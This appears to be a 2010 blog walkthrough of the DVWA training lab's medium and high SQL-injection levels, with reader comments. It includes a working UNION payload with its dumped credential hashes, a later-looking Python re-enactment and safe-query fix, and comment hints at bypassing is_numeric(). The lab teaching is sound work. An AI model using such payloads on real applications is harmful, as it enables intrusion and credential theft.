SQL Injection DVWA Continued…

June 13, 2010 at 7:59 pm (PHP, Programming, Security, SQL, SQL Injection)

Hey,

So continuing on from the low level, let’s take a look at the medium level. Here is the code:

<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    $id = mysql_real_escape_string($id);
    // $id goes into the query bare; the low level wrapped it in single quotes
    $getid="SELECT first_name, last_name FROM users WHERE user_id = $id";
    $result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
    $num=mysql_numrows($result);
    $i=0;
    while ($i < $num) {
        $first=mysql_result($result,$i,"first_name");
        $last=mysql_result($result,$i,"last_name");
        echo '<pre>';
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
        echo '</pre>';
        $i++;
    }
}
?>

Compared with the low level there are two differences. The first is the added escaping call:

$id = mysql_real_escape_string($id);

The second is easy to miss: the low level wrapped $id in single quotes (WHERE user_id = '$id'), whereas here it is dropped into the query bare (WHERE user_id = $id). mysql_real_escape_string() only backslash-escapes quotes and a handful of other characters; it does nothing to stop the value being parsed as SQL once it sits outside a string literal. So all the escaping costs us is the use of quotes, and the low-level payload still works once the quote is removed, like so:

ID: 1 union all select user,password from dvwa.users--
First name: admin
Surname: admin
ID: 1 union all select user,password from dvwa.users--
First name: admin
Surname: bf03145925aadc81e733e788aaa58fe3
ID: 1 union all select user,password from dvwa.users--
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03
ID: 1 union all select user,password from dvwa.users--
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1 union all select user,password from dvwa.users--
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1 union all select user,password from dvwa.users--
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

The same user names and password hashes come back as before. The reason quotes are out is plain from the code above: any quote we send is escaped to \' before it reaches the query, so a payload that tries to close a string literal breaks the statement instead of completing it.

Let’s talk about the high level then, first let’s take a look at the code:

<?php
if(isset($_GET['Submit'])){
    // Retrieve data
    $id = $_GET['id'];
    $id = stripslashes($id);               // undoes magic_quotes_gpc escaping, if enabled
    $id = mysql_real_escape_string($id);
    if (is_numeric($id)){                  // only a numeric string reaches the query
        // $id is wrapped in quotes again, unlike the medium level
        $getid="SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
        $num=mysql_numrows($result);
        $i=0;
        while ($i < $num) {
            $first=mysql_result($result,$i,"first_name");
            $last=mysql_result($result,$i,"last_name");
            echo '<pre>';
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
            echo '</pre>';
            $i++;
        }
    }
}
?>

This level adds stripslashes() (which only undoes magic_quotes_gpc, so it is not really a control on its own), keeps the escaping call, puts the quotes around $id back in the query, and, most importantly, only runs the query at all if is_numeric($id) is true. As far as I am aware it is not exploitable. The relevant bit of code is:

// Retrieve data
$id = $_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
if (is_numeric($id)){
    $getid="SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result=mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );

I know from the medium level that I can get past the mysql_real_escape_string($id) call, but I am not sure how to here and have not found a way to circumvent the stripslashes() and is_numeric() functions. If anyone has a way to circumvent this, please let me know!
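To make the difference between the three levels concrete, here is an added example (my own re-enactment, not DVWA's code) that rebuilds each level's query construction in Python and runs it against an in-memory sqlite3 database standing in for MySQL. mysql_real_escape_string() and is_numeric() are re-implemented as approximations, the users table and its rows are constructed sample data, and stripslashes() is left out because it only undoes magic_quotes_gpc. It shows the medium-level payload from above working without quotes, the same payload failing once the quote is put back, the high level refusing it at is_numeric(), and a cast-and-bind version that keeps the value out of the SQL text altogether.

```python
"""Re-enactment of the DVWA low/medium/high SQL-injection levels on sqlite3."""
import re
import sqlite3

# Constructed sample rows (not DVWA's seed data), shaped like the users table the
# page's payload reads: user_id, first_name, last_name, user, password.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "Gordon", "Brown", "gordonb", "e99a18c428cb38d5f260853678922e03"),
]

QUOTED_PAYLOAD = "1' union all select user,password from dvwa.users-- "
UNQUOTED_PAYLOAD = "1 union all select user,password from dvwa.users-- "

QUERY = "SELECT first_name, last_name FROM users WHERE user_id = "


def open_db():
    """Fresh in-memory database; an attached schema named dvwa makes the page's
    `dvwa.users` reference resolve, and the unqualified `users` finds it too."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS dvwa")
    conn.execute("CREATE TABLE dvwa.users (user_id INTEGER, first_name TEXT, "
                 "last_name TEXT, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO dvwa.users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def mysql_real_escape_string(s):
    """Approximation of PHP's mysql_real_escape_string(): backslash-escape the
    characters MySQL treats specially inside a quoted string literal."""
    table = {"\\": "\\\\", "'": "\\'", '"': '\\"', "\0": "\\0",
             "\n": "\\n", "\r": "\\r", "\x1a": "\\Z"}
    return "".join(table.get(c, c) for c in s)


_NUMERIC = re.compile(r"^\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")


def is_numeric(s):
    """Approximation of PHP 7+ is_numeric(): optional leading whitespace and
    sign, then a decimal or float literal (PHP < 7 also accepted 0x.. hex)."""
    return _NUMERIC.match(s) is not None


def build_query(level, raw_id):
    """SQL text each DVWA level would send for ?id=raw_id, or None when the
    level refuses the input. Mirrors the page's PHP minus stripslashes()."""
    if level == "low":
        return f"{QUERY}'{raw_id}'"                           # quoted, unescaped
    if level == "medium":
        return f"{QUERY}{mysql_real_escape_string(raw_id)}"   # escaped, but unquoted
    if level == "high":
        escaped = mysql_real_escape_string(raw_id)
        # Escaping runs first, so any input that needed escaping now carries a
        # backslash and cannot pass is_numeric(); the quotes close the rest.
        if not is_numeric(escaped):
            return None
        return f"{QUERY}'{escaped}'"
    raise ValueError(f"unknown level {level!r}")


def run(level, raw_id):
    """Execute the level's query. Returns the rows, or a string saying why none
    came back (input rejected before the query, or the SQL failed to parse)."""
    sql = build_query(level, raw_id)
    if sql is None:
        return "rejected by is_numeric()"
    try:
        return open_db().execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return f"SQL error: {exc}"


def run_safe(raw_id):
    """What the high level should do: cast to int and bind a parameter, so the
    value never becomes part of the SQL text at all."""
    try:
        user_id = int(raw_id)
    except ValueError:
        return "rejected: not an integer"
    return open_db().execute(f"{QUERY}?", (user_id,)).fetchall()


if __name__ == "__main__":
    for level, payload in [("low", QUOTED_PAYLOAD), ("medium", QUOTED_PAYLOAD),
                           ("medium", UNQUOTED_PAYLOAD), ("high", UNQUOTED_PAYLOAD),
                           ("high", "1")]:
        print(f"{level:6} {payload!r:60} -> {run(level, payload)}")
    print(f"safe   {UNQUOTED_PAYLOAD!r:60} -> {run_safe(UNQUOTED_PAYLOAD)}")
```

Two things worth drawing out. In the high level the escaping call runs before is_numeric(), so anything that needed escaping now carries a backslash and is rejected regardless, and the quotes around $id confine whatever does pass to a string literal. is_numeric() is also looser than it looks: it accepts leading whitespace, a sign and exponents such as 1e3, and on PHP before 7.0 it accepted hex strings such as 0x1A, but because the value is quoted those reach MySQL as a string that gets compared numerically, not as SQL. The mysql_* extension this code depends on was removed in PHP 7.0; the cast-and-bind shape of run_safe() is what replaces it.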


7 Comments

  1. Jake Black said,

    The medium level is not the same “apart from the mysql_real_escape_string() call.” There is also the difference that $id is single-quoted in the low level but not in the medium level, which makes all the difference.

    The high level is meant to be secure (unexploitable) I believe. So I guess it’s GOOD that you don’t see a way to break it. 🙂

    Thanks for your blog (a year later…)

  2. no name said,

    Have you tried using ASCII chars?

  3. eddy said,

    Hello there,
    nice to meet you 🙂

    stripslashes()
    will reject single quote (')
    ex. WHERE id=1' <-- single quote will reject

    so we can use other query for check,
    ex. WHERE id=1 AND 1=2--
    AND 1=2-- <-- can be used to replace single quote (')

    next, for the is_numeric() function I'm still trying to bypass it 😀

    #eddy
    sorry, my English is sooo bad T_T

  4. j4y said,

    Hi, I want to make friends with you. Can you contact me at j4ymail@163.com?

  5. j4y said,

    And I am analysing how to circumvent is_numeric().

  6. dog training said,

    This paragraph is actually a pleasant one it assists new web users, who are wishing for blogging.

  7. dogasantos said,

    To bypass is_numeric and evaluate your correct payload, you can use hexadecimal values. You can search for the "Hexadecimal Literals" reference in the MySQL docs.
